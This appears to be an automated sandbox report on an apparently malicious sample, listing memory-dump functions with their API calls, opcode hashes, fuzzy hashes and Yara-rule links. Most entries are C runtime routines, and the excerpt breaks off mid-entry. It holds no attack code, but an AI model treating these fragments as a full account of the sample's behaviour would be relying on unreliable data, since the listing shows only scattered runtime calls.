                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                        • API String ID: 441990211-897913220
                                                                                                        • Opcode ID: e8b9c2b94cd052fa2b5cbf5ae29d9ad70ff1b79ccdffbf4fdfeb3df6417c3f76
                                                                                                        • Instruction ID: d82bcd62865a2e9ad23b4c97f511dc0c4988d460f181c32ca875a552796bf775
                                                                                                        • Opcode Fuzzy Hash: e8b9c2b94cd052fa2b5cbf5ae29d9ad70ff1b79ccdffbf4fdfeb3df6417c3f76
                                                                                                        • Instruction Fuzzy Hash: AC5156315182449BC718FB60DC529EFB3A8BF94344F40481DF546431A2EF38A69DEBD2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F20CF4 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __flush__getptd_noexit__lock_file__write
                                                                                                        • String ID:
                                                                                                        • API String ID: 1331135983-0
                                                                                                        • Opcode ID: 4879aebcc42f2cfd5c723612ec9454cad79d9c5c06f0274fcc7fc003bc5fb55c
                                                                                                        • Instruction ID: ede9920214ebcfdc2967ee7336b9bd1d838a96b134aca711b174821b6a4a890e
                                                                                                        • Opcode Fuzzy Hash: 4879aebcc42f2cfd5c723612ec9454cad79d9c5c06f0274fcc7fc003bc5fb55c
                                                                                                        • Instruction Fuzzy Hash: 85119433902F309AE6255AB4BC4276E3650AF42770F688749F4758E1C3CF6CAA43A751
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0EF50 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F0EF69
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • _malloc.LIBCMT ref: 00F0EF85
                                                                                                        • _memset.LIBCMT ref: 00F0EF9B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _malloc$AllocateHeap_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3655941445-0
                                                                                                        • Opcode ID: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                                                                                                        • Instruction ID: d8c52d56de58004594d18a04730d87802c05dfda6ca03bf0eb1e76088de4d6f9
                                                                                                        • Opcode Fuzzy Hash: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                                                                                                        • Instruction Fuzzy Hash: 2D11C631500625EFCB10DF98D881A5ABBB5FF89311F2445A8E9489F396D731B912EBC1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F23B4C Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F23B64
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • std::exception::exception.LIBCMT ref: 00F23B82
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F23B97
                                                                                                          • Part of subcall function 00F30ECA: RaiseException.KERNEL32(?,?,00F4F26B,?,?,00000000,?,?,?,?,00F4F26B,?,010081FC,?), ref: 00F30F1F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 3074076210-0
                                                                                                        • Opcode ID: 3529db3f4e3d4fb8d617f98fb481c589fef1cca045bc6bccbc8293aef4f73ec0
                                                                                                        • Instruction ID: 38c08d8832767c3eb99f670b9b22d43516e993317738a8f447dc707fdd356075
                                                                                                        • Opcode Fuzzy Hash: 3529db3f4e3d4fb8d617f98fb481c589fef1cca045bc6bccbc8293aef4f73ec0
                                                                                                        • Instruction Fuzzy Hash: 24F0A47190022E66CB01AF98ED56EDEBBEC9F41320F10446AFC14A6182DFB99A44B6D1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F54C00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F54AE0: GetStdHandle.KERNEL32(000000F4,00F54C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00F5480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00F51D37,00000000,00F0CDAE,00000001,00000001), ref: 00F54AFA
                                                                                                          • Part of subcall function 00F54AE0: GetFileType.KERNEL32(00000000), ref: 00F54B05
                                                                                                          • Part of subcall function 00F54AE0: __vfwprintf_p.LIBCMT ref: 00F54B27
                                                                                                        • _raise.LIBCMT ref: 00F54C18
                                                                                                          • Part of subcall function 00F2A12E: __getptd_noexit.LIBCMT ref: 00F2A16B
                                                                                                          • Part of subcall function 00F27CEC: _doexit.LIBCMT ref: 00F27CF6
                                                                                                        Strings
                                                                                                        • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00F54C0C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                        • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                        • API String ID: 2149077303-4210838268
                                                                                                        • Opcode ID: ce60fc87af435479b0b9ade8fbb6bb7a8f42ec9976ba02048b34f17a4ee1993c
                                                                                                        • Instruction ID: 9525902823f60ace3b26ec8d46812e71265220b9b56e69f6a145e841e7719736
                                                                                                        • Opcode Fuzzy Hash: ce60fc87af435479b0b9ade8fbb6bb7a8f42ec9976ba02048b34f17a4ee1993c
                                                                                                        • Instruction Fuzzy Hash: C6D09E79589310BFD9027B90EC07A0A7A52BF44714F448414F69E141A2D67A9134BB57
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0FD57 Relevance: 3.1, APIs: 2, Instructions: 134fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                        • String ID:
                                                                                                        • API String ID: 2799698630-0
                                                                                                        • Opcode ID: f898615b2028a1ea5ead576c422e552e374223ba15db63b97e947938ff2161a4
                                                                                                        • Instruction ID: 399313b2224c33df3099687f10d276146351bd4dd872716286f63b7d8c0970bb
                                                                                                        • Opcode Fuzzy Hash: f898615b2028a1ea5ead576c422e552e374223ba15db63b97e947938ff2161a4
                                                                                                        • Instruction Fuzzy Hash: 1B519C71C05219DAEF20DB60DC467DEB7B5BF24318F0440A9D40D67291EB769AC8EF52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F22310 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock_file_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 26237723-0
                                                                                                        • Opcode ID: 2a1637c59abe8ba47795e2581ae266322740b582336e16b69e989e4a7043d5ad
                                                                                                        • Instruction ID: 0ad003107a6d75b8e24d137374347b4b36ce7c46e2a93ac044f3c3a18f032d67
                                                                                                        • Opcode Fuzzy Hash: 2a1637c59abe8ba47795e2581ae266322740b582336e16b69e989e4a7043d5ad
                                                                                                        • Instruction Fuzzy Hash: DE018431C01228FBCF62EFA5AC0299E7B61AF44370F184115F82856192DB3D8A62FB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F23A38 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F25208: __getptd_noexit.LIBCMT ref: 00F25208
                                                                                                        • __lock_file.LIBCMT ref: 00F23A7D
                                                                                                          • Part of subcall function 00F20E53: __lock.LIBCMT ref: 00F20E76
                                                                                                        • __fclose_nolock.LIBCMT ref: 00F23A88
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                        • String ID:
                                                                                                        • API String ID: 2800547568-0
                                                                                                        • Opcode ID: 2e6940cc6fd4845be5e121c3c5510e7d4f272c7be63b18a7410e4ae6b8261447
                                                                                                        • Instruction ID: e94de9637cf51a7a076916a35897defb9f30736e2d5369a5f510d439c9bcc5eb
                                                                                                        • Opcode Fuzzy Hash: 2e6940cc6fd4845be5e121c3c5510e7d4f272c7be63b18a7410e4ae6b8261447
                                                                                                        • Instruction Fuzzy Hash: F0F0BB72C01734AAD710BFB56C0275E7AA45F01734F158158E4A49B1C1CB7C9742BF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F23455 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __lock_file.LIBCMT ref: 00F23489
                                                                                                        • __ftell_nolock.LIBCMT ref: 00F23494
                                                                                                          • Part of subcall function 00F25208: __getptd_noexit.LIBCMT ref: 00F25208
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                        • String ID:
                                                                                                        • API String ID: 2999321469-0
                                                                                                        • Opcode ID: 79c5dabbc249625acfa82e48b62fa51392c8cb7c59f38a821cf709ab78fb9582
                                                                                                        • Instruction ID: 5f91bf2cc8a764b521ff846cc9c9d8b8bed2ba0e0341bccf67662ff2c969c90f
                                                                                                        • Opcode Fuzzy Hash: 79c5dabbc249625acfa82e48b62fa51392c8cb7c59f38a821cf709ab78fb9582
                                                                                                        • Instruction Fuzzy Hash: 3EF0A072902634EAD711FBB5BC0379E76A05F41334F254645F020AB1C2CF7C8B427AA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F118C5 Relevance: 2.5, APIs: 2, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F118DD
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00F118E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFreeHandleVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2443081362-0
                                                                                                        • Opcode ID: 96761cd34de632578c974b20183ed81c7f8f8a6ce9e3445f110dbc4587827f45
                                                                                                        • Instruction ID: 5aaaadf6a535f21383b86dc51207f462dd43bdb7d84725c66b01335ca3ba4d8a
                                                                                                        • Opcode Fuzzy Hash: 96761cd34de632578c974b20183ed81c7f8f8a6ce9e3445f110dbc4587827f45
                                                                                                        • Instruction Fuzzy Hash: CEE08636A415089BC7208B99ED81BDDB374F785730F204369D919732D047312D02AA94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F16950 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F169DF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 120817956-0
                                                                                                        • Opcode ID: afc18ef408fcf9f2524690ddff664799ffd7ed2b12f68d1fb338309195cab982
                                                                                                        • Instruction ID: f333055b14a137d3a553ad47765288d932d718ec0a765c7fb8b6f16c7c4979e4
                                                                                                        • Opcode Fuzzy Hash: afc18ef408fcf9f2524690ddff664799ffd7ed2b12f68d1fb338309195cab982
                                                                                                        • Instruction Fuzzy Hash: 4C31D4B2E006059BCB20DF68C8816AEB7F8EF45720F20423DE856D7740DB359D449BE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F16760 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F167E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 120817956-0
                                                                                                        • Opcode ID: 02323cb7c5b0e01f289af39497244fed04d853e19cc3a3394fc64b6c593ef4cf
                                                                                                        • Instruction ID: 53c181fccd3b98768484814f3152a284be75ba02e951597ea7d3dbb961aba86d
                                                                                                        • Opcode Fuzzy Hash: 02323cb7c5b0e01f289af39497244fed04d853e19cc3a3394fc64b6c593ef4cf
